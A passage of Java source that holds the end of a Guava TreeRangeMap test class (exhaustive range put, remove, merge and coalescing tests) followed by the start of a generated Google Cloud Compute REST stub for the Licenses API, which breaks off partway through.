rangeMap.subRangeMap(Range.atMost(22)).asDescendingMapOfRanges(); } @SuppressWarnings("unchecked") @Override public Entry<Range<Integer>, String>[] createArray(int length) { return (Entry<Range<Integer>, String>[]) new Entry<?, ?>[length]; } @Override public Iterable<Entry<Range<Integer>, String>> order( List<Entry<Range<Integer>, String>> insertionOrder) { return Range.<Integer>rangeLexOrdering() .reverse() .onKeys() .sortedCopy(insertionOrder); } @SuppressWarnings("unchecked") @Override public Range<Integer>[] createKeyArray(int length) { return (Range<Integer>[]) new Range<?>[length]; } @Override public String[] createValueArray(int length) { return new String[length]; } }) .named("TreeRangeMap.subRangeMap.asDescendingMapOfRanges") .withFeatures( CollectionSize.ANY, MapFeature.SUPPORTS_REMOVE, MapFeature.ALLOWS_ANY_NULL_QUERIES, CollectionFeature.KNOWN_ORDER) .createTestSuite()); return suite; } private static final ImmutableList<Range<Integer>> RANGES; private static final int MIN_BOUND = -2; private static final int MAX_BOUND = 2; static { ImmutableList.Builder<Range<Integer>> builder = ImmutableList.builder(); builder.add(Range.<Integer>all()); // Add one-ended ranges for (int i = MIN_BOUND; i <= MAX_BOUND; i++) { for (BoundType type : BoundType.values()) { builder.add(Range.upTo(i, type)); builder.add(Range.downTo(i, type)); } } // Add two-ended ranges for (int i = MIN_BOUND; i <= MAX_BOUND; i++) { for (int j = i; j <= MAX_BOUND; j++) { for (BoundType lowerType : BoundType.values()) { for (BoundType upperType : BoundType.values()) { if (i == j & lowerType == OPEN & upperType == OPEN) { continue; } builder.add(Range.range(i, lowerType, j, upperType)); } } } } RANGES = builder.build(); } public void testSpanSingleRange() { for (Range<Integer> range : RANGES) { RangeMap<Integer, Integer> rangeMap = TreeRangeMap.create(); rangeMap.put(range, 1); try { assertEquals(range, rangeMap.span()); assertFalse(range.isEmpty()); } catch (NoSuchElementException e) { assertTrue(range.isEmpty()); } } } public void testSpanTwoRanges() { for (Range<Integer> range1 : RANGES) { for (Range<Integer> range2 : RANGES) { RangeMap<Integer, Integer> rangeMap = TreeRangeMap.create(); rangeMap.put(range1, 1); rangeMap.put(range2, 2); Range<Integer> expected; if (range1.isEmpty()) { if (range2.isEmpty()) { expected = null; } else { expected = range2; } } else { if (range2.isEmpty()) { expected = range1; } else { expected = range1.span(range2); } } try { assertEquals(expected, rangeMap.span()); assertNotNull(expected); } catch (NoSuchElementException e) { assertNull(expected); } } } } public void testAllRangesAlone() { for (Range<Integer> range : RANGES) { Map<Integer, Integer> model = new HashMap<>(); putModel(model, range, 1); RangeMap<Integer, Integer> test = TreeRangeMap.create(); test.put(range, 1); verify(model, test); } } public void testAllRangePairs() { for (Range<Integer> range1 : RANGES) { for (Range<Integer> range2 : RANGES) { Map<Integer, Integer> model = new HashMap<>(); putModel(model, range1, 1); putModel(model, range2, 2); RangeMap<Integer, Integer> test = TreeRangeMap.create(); test.put(range1, 1); test.put(range2, 2); verify(model, test); } } } public void testAllRangeTriples() { for (Range<Integer> range1 : RANGES) { for (Range<Integer> range2 : RANGES) { for (Range<Integer> range3 : RANGES) { Map<Integer, Integer> model = new HashMap<>(); putModel(model, range1, 1); putModel(model, range2, 2); putModel(model, range3, 3); RangeMap<Integer, Integer> test = TreeRangeMap.create(); test.put(range1, 1); test.put(range2, 2); test.put(range3, 3); verify(model, test); } } } } public void testPutAll() { for (Range<Integer> range1 : RANGES) { for (Range<Integer> range2 : RANGES) { for (Range<Integer> range3 : RANGES) { Map<Integer, Integer> model = new HashMap<>(); putModel(model, range1, 1); putModel(model, range2, 2); putModel(model, range3, 3); RangeMap<Integer, Integer> test = TreeRangeMap.create(); RangeMap<Integer, Integer> test2 = TreeRangeMap.create(); // put range2 and range3 into test2, and then put test2 into test test.put(range1, 1); test2.put(range2, 2); test2.put(range3, 3); test.putAll(test2); verify(model, test); } } } } public void testPutAndRemove() { for (Range<Integer> rangeToPut : RANGES) { for (Range<Integer> rangeToRemove : RANGES) { Map<Integer, Integer> model = new HashMap<>(); putModel(model, rangeToPut, 1); removeModel(model, rangeToRemove); RangeMap<Integer, Integer> test = TreeRangeMap.create(); test.put(rangeToPut, 1); test.remove(rangeToRemove); verify(model, test); } } } public void testPutTwoAndRemove() { for (Range<Integer> rangeToPut1 : RANGES) { for (Range<Integer> rangeToPut2 : RANGES) { for (Range<Integer> rangeToRemove : RANGES) { Map<Integer, Integer> model = new HashMap<>(); putModel(model, rangeToPut1, 1); putModel(model, rangeToPut2, 2); removeModel(model, rangeToRemove); RangeMap<Integer, Integer> test = TreeRangeMap.create(); test.put(rangeToPut1, 1); test.put(rangeToPut2, 2); test.remove(rangeToRemove); verify(model, test); } } } } // identical to testPutTwoAndRemove, // verifies that putCoalescing() doesn't cause any mappings to change relative to put() public void testPutCoalescingTwoAndRemove() { for (Range<Integer> rangeToPut1 : RANGES) { for (Range<Integer> rangeToPut2 : RANGES) { for (Range<Integer> rangeToRemove : RANGES) { Map<Integer, Integer> model = new HashMap<>(); putModel(model, rangeToPut1, 1); putModel(model, rangeToPut2, 2); removeModel(model, rangeToRemove); RangeMap<Integer, Integer> test = TreeRangeMap.create(); test.putCoalescing(rangeToPut1, 1); test.putCoalescing(rangeToPut2, 2); test.remove(rangeToRemove); verify(model, test); } } } } public void testPutCoalescing() { // {[0..1): 1, [1..2): 1, [2..3): 2} -> {[0..2): 1, [2..3): 2} RangeMap<Integer, Integer> rangeMap = TreeRangeMap.create(); rangeMap.putCoalescing(Range.closedOpen(0, 1), 1); rangeMap.putCoalescing(Range.closedOpen(1, 2), 1); rangeMap.putCoalescing(Range.closedOpen(2, 3), 2); assertEquals( ImmutableMap.of(Range.closedOpen(0, 2), 1, Range.closedOpen(2, 3), 2), rangeMap.asMapOfRanges()); } public void testPutCoalescingEmpty() { RangeMap<Integer, Integer> rangeMap = TreeRangeMap.create(); rangeMap.put(Range.closedOpen(0, 1), 1); rangeMap.put(Range.closedOpen(1, 2), 1); assertEquals( ImmutableMap.of(Range.closedOpen(0, 1), 1, Range.closedOpen(1, 2), 1), rangeMap.asMapOfRanges()); rangeMap.putCoalescing(Range.closedOpen(1, 1), 1); // empty range coalesces connected ranges assertEquals(ImmutableMap.of(Range.closedOpen(0, 2), 1), rangeMap.asMapOfRanges()); } public void testPutCoalescingSubmapEmpty() { RangeMap<Integer, Integer> rangeMap = TreeRangeMap.create(); rangeMap.put(Range.closedOpen(0, 1), 1); rangeMap.put(Range.closedOpen(1, 2), 1); assertEquals( ImmutableMap.of(Range.closedOpen(0, 1), 1, Range.closedOpen(1, 2), 1), rangeMap.asMapOfRanges()); RangeMap<Integer, Integer> subRangeMap = rangeMap.subRangeMap(Range.closedOpen(0, 2)); subRangeMap.putCoalescing(Range.closedOpen(1, 1), 1); // empty range coalesces connected ranges assertEquals(ImmutableMap.of(Range.closedOpen(0, 2), 1), subRangeMap.asMapOfRanges()); assertEquals(ImmutableMap.of(Range.closedOpen(0, 2), 1), rangeMap.asMapOfRanges()); } public void testPutCoalescingComplex() { // {[0..1): 1, [1..3): 1, [3..5): 1, [7..10): 2, [12..15): 2, [18..19): 3} RangeMap<Integer, Integer> rangeMap = TreeRangeMap.create(); rangeMap.put(Range.closedOpen(0, 1), 1); rangeMap.put(Range.closedOpen(1, 3), 1); rangeMap.put(Range.closedOpen(3, 5), 1); rangeMap.put(Range.closedOpen(7, 10), 2); rangeMap.put(Range.closedOpen(12, 15), 2); rangeMap.put(Range.closedOpen(18, 19), 3); rangeMap.putCoalescing(Range.closedOpen(-5, -4), 0); // disconnected rangeMap.putCoalescing(Range.closedOpen(-6, -5), 0); // lower than minimum rangeMap.putCoalescing(Range.closedOpen(2, 4), 1); // between rangeMap.putCoalescing(Range.closedOpen(9, 14), 0); // different value rangeMap.putCoalescing(Range.closedOpen(17, 20), 3); // enclosing rangeMap.putCoalescing(Range.closedOpen(22, 23), 4); // disconnected rangeMap.putCoalescing(Range.closedOpen(23, 25), 4); // greater than minimum // {[-6..-4): 0, [0..1): 1, [1..5): 1, [7..9): 2, // [9..14): 0, [14..15): 2, [17..20): 3, [22..25): 4} assertEquals( new ImmutableMap.Builder<>() .put(Range.closedOpen(-6, -4), 0) .put(Range.closedOpen(0, 1), 1) // not coalesced .put(Range.closedOpen(1, 5), 1) .put(Range.closedOpen(7, 9), 2) .put(Range.closedOpen(9, 14), 0) .put(Range.closedOpen(14, 15), 2) .put(Range.closedOpen(17, 20), 3) .put(Range.closedOpen(22, 25), 4) .build(), rangeMap.asMapOfRanges()); } public void testMergeOntoRangeOverlappingLowerBound() { // {[0..2): 1} RangeMap<Integer, Integer> rangeMap = TreeRangeMap.create(); rangeMap.put(Range.closedOpen(0, 2), 1); rangeMap.merge(Range.closedOpen(1, 3), 2, Integer::sum); // {[0..1): 1, [1..2): 3, [2, 3): 2} assertEquals( new ImmutableMap.Builder<>() .put(Range.closedOpen(0, 1), 1) .put(Range.closedOpen(1, 2), 3) .put(Range.closedOpen(2, 3), 2) .build(), rangeMap.asMapOfRanges()); } public void testMergeOntoRangeOverlappingUpperBound() { // {[1..3): 1} RangeMap<Integer, Integer> rangeMap = TreeRangeMap.create(); rangeMap.put(Range.closedOpen(1, 3), 1); rangeMap.merge(Range.closedOpen(0, 2), 2, Integer::sum); // {[0..1): 2, [1..2): 3, [2, 3): 1} assertEquals( new ImmutableMap.Builder<>() .put(Range.closedOpen(0, 1), 2) .put(Range.closedOpen(1, 2), 3) .put(Range.closedOpen(2, 3), 1) .build(), rangeMap.asMapOfRanges()); } public void testMergeOntoIdenticalRange() { // {[0..1): 1} RangeMap<Integer, Integer> rangeMap = TreeRangeMap.create(); rangeMap.put(Range.closedOpen(0, 1), 1); rangeMap.merge(Range.closedOpen(0, 1), 2, Integer::sum); // {[0..1): 3} assertEquals(ImmutableMap.of(Range.closedOpen(0, 1), 3), rangeMap.asMapOfRanges()); } public void testMergeOntoSuperRange() { // {[0..3): 1} RangeMap<Integer, Integer> rangeMap = TreeRangeMap.create(); rangeMap.put(Range.closedOpen(0, 3), 1); rangeMap.merge(Range.closedOpen(1, 2), 2, Integer::sum); // {[0..1): 1, [1..2): 3, [2..3): 1} assertEquals( new ImmutableMap.Builder<>() .put(Range.closedOpen(0, 1), 1) .put(Range.closedOpen(1, 2), 3) .put(Range.closedOpen(2, 3), 1) .build(), rangeMap.asMapOfRanges()); } public void testMergeOntoSubRange() { // {[1..2): 1} RangeMap<Integer, Integer> rangeMap = TreeRangeMap.create(); rangeMap.put(Range.closedOpen(1, 2), 1); rangeMap.merge(Range.closedOpen(0, 3), 2, Integer::sum); // {[0..1): 2, [1..2): 3, [2..3): 2} assertEquals( new ImmutableMap.Builder<>() .put(Range.closedOpen(0, 1), 2) .put(Range.closedOpen(1, 2), 3) .put(Range.closedOpen(2, 3), 2) .build(), rangeMap.asMapOfRanges()); } public void testMergeOntoDisconnectedRanges() { // {[0..1): 1, [2, 3): 2} RangeMap<Integer, Integer> rangeMap = TreeRangeMap.create(); rangeMap.put(Range.closedOpen(0, 1), 1); rangeMap.put(Range.closedOpen(2, 3), 2); rangeMap.merge(Range.closedOpen(0, 3), 3, Integer::sum); // {[0..1): 4, [1..2): 3, [2..3): 5} assertEquals( new ImmutableMap.Builder<>() .put(Range.closedOpen(0, 1), 4) .put(Range.closedOpen(1, 2), 3) .put(Range.closedOpen(2, 3), 5) .build(), rangeMap.asMapOfRanges()); } public void testMergeNullValue() { // {[1..2): 1, [3, 4): 2} RangeMap<Integer, Integer> rangeMap = TreeRangeMap.create(); rangeMap.put(Range.closedOpen(1, 2), 1); rangeMap.put(Range.closedOpen(3, 4), 2); rangeMap.merge(Range.closedOpen(0, 5), null, (v1, v2) -> v1 + 1); // {[1..2): 2, [3..4): 3} assertEquals( new ImmutableMap.Builder<>() .put(Range.closedOpen(1, 2), 2) .put(Range.closedOpen(3, 4), 3) .build(), rangeMap.asMapOfRanges()); } public void testMergeWithRemappingFunctionReturningNullValue() { // {[1..2): 1, [3, 4): 2} RangeMap<Integer, Integer> rangeMap = TreeRangeMap.create(); rangeMap.put(Range.closedOpen(1, 2), 1); rangeMap.put(Range.closedOpen(3, 4), 2); rangeMap.merge(Range.closedOpen(0, 5), 3, (v1, v2) -> null); // {[0..1): 3, [2..3): 3, [4, 5): 3} assertEquals( new ImmutableMap.Builder<>() .put(Range.closedOpen(0, 1), 3) .put(Range.closedOpen(2, 3), 3) .put(Range.closedOpen(4, 5), 3) .build(), rangeMap.asMapOfRanges()); } public void testMergeAllRangeTriples() { for (Range<Integer> range1 : RANGES) { for (Range<Integer> range2 : RANGES) { for (Range<Integer> range3 : RANGES) { Map<Integer, Integer> model = new HashMap<>(); mergeModel(model, range1, 1, Integer::sum); mergeModel(model, range2, 2, Integer::sum); mergeModel(model, range3, 3, Integer::sum); RangeMap<Integer, Integer> test = TreeRangeMap.create(); test.merge(range1, 1, Integer::sum); test.merge(range2, 2, Integer::sum); test.merge(range3, 3, Integer::sum); verify(model, test); } } } } public void testSubRangeMapExhaustive() { for (Range<Integer> range1 : RANGES) { for (Range<Integer> range2 : RANGES) { RangeMap<Integer, Integer> rangeMap = TreeRangeMap.create(); rangeMap.put(range1, 1); rangeMap.put(range2, 2); for (Range<Integer> subRange : RANGES) { RangeMap<Integer, Integer> expected = TreeRangeMap.create(); for (Entry<Range<Integer>, Integer> entry : rangeMap.asMapOfRanges().entrySet()) { if (entry.getKey().isConnected(subRange)) { expected.put(entry.getKey().intersection(subRange), entry.getValue()); } } RangeMap<Integer, Integer> subRangeMap = rangeMap.subRangeMap(subRange); assertEquals(expected, subRangeMap); assertEquals(expected.asMapOfRanges(), subRangeMap.asMapOfRanges()); assertEquals(expected.asDescendingMapOfRanges(), subRangeMap.asDescendingMapOfRanges()); assertEquals( ImmutableList.copyOf(subRangeMap.asMapOfRanges().entrySet()).reverse(), ImmutableList.copyOf(subRangeMap.asDescendingMapOfRanges().entrySet())); if (!expected.asMapOfRanges().isEmpty()) { assertEquals(expected.span(), subRangeMap.span()); } for (int i = MIN_BOUND; i <= MAX_BOUND; i++) { assertEquals(expected.get(i), subRangeMap.get(i)); } for (Range<Integer> query : RANGES) { assertEquals( expected.asMapOfRanges().get(query), subRangeMap.asMapOfRanges().get(query)); } } } } } public void testSubSubRangeMap() { RangeMap<Integer, Integer> rangeMap = TreeRangeMap.create(); rangeMap.put(Range.open(3, 7), 1); rangeMap.put(Range.closed(9, 10), 2); rangeMap.put(Range.closed(12, 16), 3); RangeMap<Integer, Integer> sub1 = rangeMap.subRangeMap(Range.closed(5, 11)); assertEquals( ImmutableMap.of(Range.closedOpen(5, 7), 1, Range.closed(9, 10), 2), sub1.asMapOfRanges()); RangeMap<Integer, Integer> sub2 = sub1.subRangeMap(Range.open(6, 15)); assertEquals( ImmutableMap.of(Range.open(6, 7), 1, Range.closed(9, 10), 2), sub2.asMapOfRanges()); } public void testSubRangeMapPut() { RangeMap<Integer, Integer> rangeMap = TreeRangeMap.create(); rangeMap.put(Range.open(3, 7), 1); rangeMap.put(Range.closed(9, 10), 2); rangeMap.put(Range.closed(12, 16), 3); RangeMap<Integer, Integer> sub = rangeMap.subRangeMap(Range.closed(5, 11)); assertEquals( ImmutableMap.of(Range.closedOpen(5, 7), 1, Range.closed(9, 10), 2), sub.asMapOfRanges()); sub.put(Range.closed(7, 9), 4); assertEquals( ImmutableMap.of( Range.closedOpen(5, 7), 1, Range.closed(7, 9), 4, Range.openClosed(9, 10), 2), sub.asMapOfRanges()); assertEquals( ImmutableMap.of( Range.open(3, 7), 1, Range.closed(7, 9), 4, Range.openClosed(9, 10), 2, Range.closed(12, 16), 3), rangeMap.asMapOfRanges()); assertThrows(IllegalArgumentException.class, () -> sub.put(Range.open(9, 12), 5)); RangeMap<Integer, Integer> subSub = sub.subRangeMap(Range.closedOpen(5, 5)); subSub.put(Range.closedOpen(5, 5), 6); // should be a no-op assertEquals( ImmutableMap.of( Range.open(3, 7), 1, Range.closed(7, 9), 4, Range.openClosed(9, 10), 2, Range.closed(12, 16), 3), rangeMap.asMapOfRanges()); } public void testSubRangeMapPutCoalescing() { RangeMap<Integer, Integer> rangeMap = TreeRangeMap.create(); rangeMap.put(Range.open(3, 7), 1); rangeMap.put(Range.closed(9, 10), 2); rangeMap.put(Range.closed(12, 16), 3); RangeMap<Integer, Integer> sub = rangeMap.subRangeMap(Range.closed(5, 11)); assertEquals( ImmutableMap.of(Range.closedOpen(5, 7), 1, Range.closed(9, 10), 2), sub.asMapOfRanges()); sub.putCoalescing(Range.closed(7, 9), 2); assertEquals( ImmutableMap.of(Range.closedOpen(5, 7), 1, Range.closed(7, 10), 2), sub.asMapOfRanges()); assertEquals( ImmutableMap.of(Range.open(3, 7), 1, Range.closed(7, 10), 2, Range.closed(12, 16), 3), rangeMap.asMapOfRanges()); sub.putCoalescing(Range.singleton(7), 1); assertEquals( ImmutableMap.of(Range.closed(5, 7), 1, Range.openClosed(7, 10), 2), sub.asMapOfRanges()); assertEquals( ImmutableMap.of( Range.open(3, 5), 1, Range.closed(5, 7), 1, Range.openClosed(7, 10), 2, Range.closed(12, 16), 3), rangeMap.asMapOfRanges()); assertThrows(IllegalArgumentException.class, () -> sub.putCoalescing(Range.open(9, 12), 5)); } public void testSubRangeMapRemove() { RangeMap<Integer, Integer> rangeMap = TreeRangeMap.create(); rangeMap.put(Range.open(3, 7), 1); rangeMap.put(Range.closed(9, 10), 2); rangeMap.put(Range.closed(12, 16), 3); RangeMap<Integer, Integer> sub = rangeMap.subRangeMap(Range.closed(5, 11)); assertEquals( ImmutableMap.of(Range.closedOpen(5, 7), 1, Range.closed(9, 10), 2), sub.asMapOfRanges()); sub.remove(Range.closed(7, 9)); assertEquals( ImmutableMap.of(Range.closedOpen(5, 7), 1, Range.openClosed(9, 10), 2), sub.asMapOfRanges()); assertEquals( ImmutableMap.of(Range.open(3, 7), 1, Range.openClosed(9, 10), 2, Range.closed(12, 16), 3), rangeMap.asMapOfRanges()); sub.remove(Range.closed(3, 9)); assertEquals(ImmutableMap.of(Range.openClosed(9, 10), 2), sub.asMapOfRanges()); assertEquals( ImmutableMap.of(Range.open(3, 5), 1, Range.openClosed(9, 10), 2, Range.closed(12, 16), 3), rangeMap.asMapOfRanges()); } public void testSubRangeMapClear() { RangeMap<Integer, Integer> rangeMap = TreeRangeMap.create(); rangeMap.put(Range.open(3, 7), 1); rangeMap.put(Range.closed(9, 10), 2); rangeMap.put(Range.closed(12, 16), 3); RangeMap<Integer, Integer> sub = rangeMap.subRangeMap(Range.closed(5, 11)); sub.clear(); assertEquals( ImmutableMap.of(Range.open(3, 5), 1, Range.closed(12, 16), 3), rangeMap.asMapOfRanges()); } public void testCopyOfTreeRangeMap() { RangeMap<Integer, Integer> rangeMap = TreeRangeMap.create(); rangeMap.put(Range.open(3, 7), 1); rangeMap.put(Range.closed(9, 10), 2); rangeMap.put(Range.closed(12, 16), 3); RangeMap<Integer, Integer> copy = TreeRangeMap.copyOf(rangeMap); assertEquals(rangeMap.asMapOfRanges(), copy.asMapOfRanges()); } public void testCopyOfImmutableRangeMap() { ImmutableRangeMap<Integer, Integer> rangeMap = ImmutableRangeMap.<Integer, Integer>builder() .put(Range.open(3, 7), 1) .put(Range.closed(9, 10), 2) .put(Range.closed(12, 16), 3) .build(); RangeMap<Integer, Integer> copy = TreeRangeMap.copyOf(rangeMap); assertEquals(rangeMap.asMapOfRanges(), copy.asMapOfRanges()); } // Overriding testEquals because it seems that we get spurious failures when it things empty // should be unequal to empty. public void testEquals() { TreeRangeMap<Integer, Integer> empty = TreeRangeMap.create(); TreeRangeMap<Integer, Integer> nonEmpty = TreeRangeMap.create(); nonEmpty.put(Range.all(), 1); TreeRangeMap<Integer, Integer> coalesced = TreeRangeMap.create(); coalesced.put(Range.atLeast(1), 1); coalesced.putCoalescing(Range.atMost(1), 1); TreeRangeMap<Integer, Integer> differentValues = TreeRangeMap.create(); differentValues.put(Range.closedOpen(1, 2), 2); differentValues.put(Range.closedOpen(3, 4), 2); TreeRangeMap<Double, Integer> differentTypes = TreeRangeMap.create(); differentTypes.put(Range.closedOpen(1.0, 2.0), 2); differentTypes.put(Range.closedOpen(3.0, 4.0), 2); new EqualsTester() .addEqualityGroup(empty, TreeRangeMap.<Integer, Integer>create()) .addEqualityGroup(nonEmpty, coalesced) .addEqualityGroup(differentValues) .addEqualityGroup(differentTypes) .testEquals(); } private void verify(Map<Integer, Integer> model, RangeMap<Integer, Integer> test) { for (int i = MIN_BOUND - 1; i <= MAX_BOUND + 1; i++) { assertEquals(model.get(i), test.get(i)); Entry<Range<Integer>, Integer> entry = test.getEntry(i); assertEquals(model.containsKey(i), entry != null); if (entry != null) { assertTrue(test.asMapOfRanges().entrySet().contains(entry)); } } for (Range<Integer> range : test.asMapOfRanges().keySet()) { assertFalse(range.isEmpty()); } } private static void putModel(Map<Integer, Integer> model, Range<Integer> range, int value) { for (int i = MIN_BOUND - 1; i <= MAX_BOUND + 1; i++) { if (range.contains(i)) { model.put(i, value); } } } private static void removeModel(Map<Integer, Integer> model, Range<Integer> range) { for (int i = MIN_BOUND - 1; i <= MAX_BOUND + 1; i++) { if (range.contains(i)) { model.remove(i); } } } private static void mergeModel( Map<Integer, Integer> model, Range<Integer> range, int value, BiFunction<? super Integer, ? super Integer, ? extends Integer> remappingFunction) { for (int i = MIN_BOUND - 1; i <= MAX_BOUND + 1; i++) { if (range.contains(i)) { model.merge(i, value, remappingFunction); } } } }
googleapis/google-cloud-java
36,102
java-compute/google-cloud-compute/src/main/java/com/google/cloud/compute/v1/stub/HttpJsonLicensesStub.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.google.cloud.compute.v1.stub; import static com.google.cloud.compute.v1.LicensesClient.ListPagedResponse; import com.google.api.core.InternalApi; import com.google.api.gax.core.BackgroundResource; import com.google.api.gax.core.BackgroundResourceAggregation; import com.google.api.gax.httpjson.ApiMethodDescriptor; import com.google.api.gax.httpjson.HttpJsonCallSettings; import com.google.api.gax.httpjson.HttpJsonOperationSnapshot; import com.google.api.gax.httpjson.HttpJsonStubCallableFactory; import com.google.api.gax.httpjson.ProtoMessageRequestFormatter; import com.google.api.gax.httpjson.ProtoMessageResponseParser; import com.google.api.gax.httpjson.ProtoRestSerializer; import com.google.api.gax.rpc.ClientContext; import com.google.api.gax.rpc.OperationCallable; import com.google.api.gax.rpc.RequestParamsBuilder; import com.google.api.gax.rpc.UnaryCallable; import com.google.cloud.compute.v1.DeleteLicenseRequest; import com.google.cloud.compute.v1.GetIamPolicyLicenseRequest; import com.google.cloud.compute.v1.GetLicenseRequest; import com.google.cloud.compute.v1.InsertLicenseRequest; import com.google.cloud.compute.v1.License; import com.google.cloud.compute.v1.LicensesListResponse; import com.google.cloud.compute.v1.ListLicensesRequest; import com.google.cloud.compute.v1.Operation; import com.google.cloud.compute.v1.Operation.Status; import com.google.cloud.compute.v1.Policy; import com.google.cloud.compute.v1.SetIamPolicyLicenseRequest; import com.google.cloud.compute.v1.TestIamPermissionsLicenseRequest; import com.google.cloud.compute.v1.TestPermissionsResponse; import com.google.cloud.compute.v1.UpdateLicenseRequest; import com.google.protobuf.TypeRegistry; import java.io.IOException; import java.util.ArrayList; import java.util.HashMap; import java.util.List; import java.util.Map; import java.util.concurrent.TimeUnit; import javax.annotation.Generated; // AUTO-GENERATED DOCUMENTATION AND CLASS. /** * REST stub implementation for the Licenses service API. * * <p>This class is for advanced usage and reflects the underlying API directly. */ @Generated("by gapic-generator-java") public class HttpJsonLicensesStub extends LicensesStub { private static final TypeRegistry typeRegistry = TypeRegistry.newBuilder().add(Operation.getDescriptor()).build(); private static final ApiMethodDescriptor<DeleteLicenseRequest, Operation> deleteMethodDescriptor = ApiMethodDescriptor.<DeleteLicenseRequest, Operation>newBuilder() .setFullMethodName("google.cloud.compute.v1.Licenses/Delete") .setHttpMethod("DELETE") .setType(ApiMethodDescriptor.MethodType.UNARY) .setRequestFormatter( ProtoMessageRequestFormatter.<DeleteLicenseRequest>newBuilder() .setPath( "/compute/v1/projects/{project}/global/licenses/{license}", request -> { Map<String, String> fields = new HashMap<>(); ProtoRestSerializer<DeleteLicenseRequest> serializer = ProtoRestSerializer.create(); serializer.putPathParam(fields, "license", request.getLicense()); serializer.putPathParam(fields, "project", request.getProject()); return fields; }) .setQueryParamsExtractor( request -> { Map<String, List<String>> fields = new HashMap<>(); ProtoRestSerializer<DeleteLicenseRequest> serializer = ProtoRestSerializer.create(); if (request.hasRequestId()) { serializer.putQueryParam(fields, "requestId", request.getRequestId()); } return fields; }) .setRequestBodyExtractor(request -> null) .build()) .setResponseParser( ProtoMessageResponseParser.<Operation>newBuilder() .setDefaultInstance(Operation.getDefaultInstance()) .setDefaultTypeRegistry(typeRegistry) .build()) .setOperationSnapshotFactory( (DeleteLicenseRequest request, Operation response) -> { StringBuilder opName = new StringBuilder(response.getName()); opName.append(":").append(request.getProject()); return HttpJsonOperationSnapshot.newBuilder() .setName(opName.toString()) .setMetadata(response) .setDone(Status.DONE.equals(response.getStatus())) .setResponse(response) .setError(response.getHttpErrorStatusCode(), response.getHttpErrorMessage()) .build(); }) .build(); private static final ApiMethodDescriptor<GetLicenseRequest, License> getMethodDescriptor = ApiMethodDescriptor.<GetLicenseRequest, License>newBuilder() .setFullMethodName("google.cloud.compute.v1.Licenses/Get") .setHttpMethod("GET") .setType(ApiMethodDescriptor.MethodType.UNARY) .setRequestFormatter( ProtoMessageRequestFormatter.<GetLicenseRequest>newBuilder() .setPath( "/compute/v1/projects/{project}/global/licenses/{license}", request -> { Map<String, String> fields = new HashMap<>(); ProtoRestSerializer<GetLicenseRequest> serializer = ProtoRestSerializer.create(); serializer.putPathParam(fields, "license", request.getLicense()); serializer.putPathParam(fields, "project", request.getProject()); return fields; }) .setQueryParamsExtractor( request -> { Map<String, List<String>> fields = new HashMap<>(); ProtoRestSerializer<GetLicenseRequest> serializer = ProtoRestSerializer.create(); return fields; }) .setRequestBodyExtractor(request -> null) .build()) .setResponseParser( ProtoMessageResponseParser.<License>newBuilder() .setDefaultInstance(License.getDefaultInstance()) .setDefaultTypeRegistry(typeRegistry) .build()) .build(); private static final ApiMethodDescriptor<GetIamPolicyLicenseRequest, Policy> getIamPolicyMethodDescriptor = ApiMethodDescriptor.<GetIamPolicyLicenseRequest, Policy>newBuilder() .setFullMethodName("google.cloud.compute.v1.Licenses/GetIamPolicy") .setHttpMethod("GET") .setType(ApiMethodDescriptor.MethodType.UNARY) .setRequestFormatter( ProtoMessageRequestFormatter.<GetIamPolicyLicenseRequest>newBuilder() .setPath( "/compute/v1/projects/{project}/global/licenses/{resource}/getIamPolicy", request -> { Map<String, String> fields = new HashMap<>(); ProtoRestSerializer<GetIamPolicyLicenseRequest> serializer = ProtoRestSerializer.create(); serializer.putPathParam(fields, "project", request.getProject()); serializer.putPathParam(fields, "resource", request.getResource()); return fields; }) .setQueryParamsExtractor( request -> { Map<String, List<String>> fields = new HashMap<>(); ProtoRestSerializer<GetIamPolicyLicenseRequest> serializer = ProtoRestSerializer.create(); if (request.hasOptionsRequestedPolicyVersion()) { serializer.putQueryParam( fields, "optionsRequestedPolicyVersion", request.getOptionsRequestedPolicyVersion()); } return fields; }) .setRequestBodyExtractor(request -> null) .build()) .setResponseParser( ProtoMessageResponseParser.<Policy>newBuilder() .setDefaultInstance(Policy.getDefaultInstance()) .setDefaultTypeRegistry(typeRegistry) .build()) .build(); private static final ApiMethodDescriptor<InsertLicenseRequest, Operation> insertMethodDescriptor = ApiMethodDescriptor.<InsertLicenseRequest, Operation>newBuilder() .setFullMethodName("google.cloud.compute.v1.Licenses/Insert") .setHttpMethod("POST") .setType(ApiMethodDescriptor.MethodType.UNARY) .setRequestFormatter( ProtoMessageRequestFormatter.<InsertLicenseRequest>newBuilder() .setPath( "/compute/v1/projects/{project}/global/licenses", request -> { Map<String, String> fields = new HashMap<>(); ProtoRestSerializer<InsertLicenseRequest> serializer = ProtoRestSerializer.create(); serializer.putPathParam(fields, "project", request.getProject()); return fields; }) .setQueryParamsExtractor( request -> { Map<String, List<String>> fields = new HashMap<>(); ProtoRestSerializer<InsertLicenseRequest> serializer = ProtoRestSerializer.create(); if (request.hasRequestId()) { serializer.putQueryParam(fields, "requestId", request.getRequestId()); } return fields; }) .setRequestBodyExtractor( request -> ProtoRestSerializer.create() .toBody("licenseResource", request.getLicenseResource(), false)) .build()) .setResponseParser( ProtoMessageResponseParser.<Operation>newBuilder() .setDefaultInstance(Operation.getDefaultInstance()) .setDefaultTypeRegistry(typeRegistry) .build()) .setOperationSnapshotFactory( (InsertLicenseRequest request, Operation response) -> { StringBuilder opName = new StringBuilder(response.getName()); opName.append(":").append(request.getProject()); return HttpJsonOperationSnapshot.newBuilder() .setName(opName.toString()) .setMetadata(response) .setDone(Status.DONE.equals(response.getStatus())) .setResponse(response) .setError(response.getHttpErrorStatusCode(), response.getHttpErrorMessage()) .build(); }) .build(); private static final ApiMethodDescriptor<ListLicensesRequest, LicensesListResponse> listMethodDescriptor = ApiMethodDescriptor.<ListLicensesRequest, LicensesListResponse>newBuilder() .setFullMethodName("google.cloud.compute.v1.Licenses/List") .setHttpMethod("GET") .setType(ApiMethodDescriptor.MethodType.UNARY) .setRequestFormatter( ProtoMessageRequestFormatter.<ListLicensesRequest>newBuilder() .setPath( "/compute/v1/projects/{project}/global/licenses", request -> { Map<String, String> fields = new HashMap<>(); 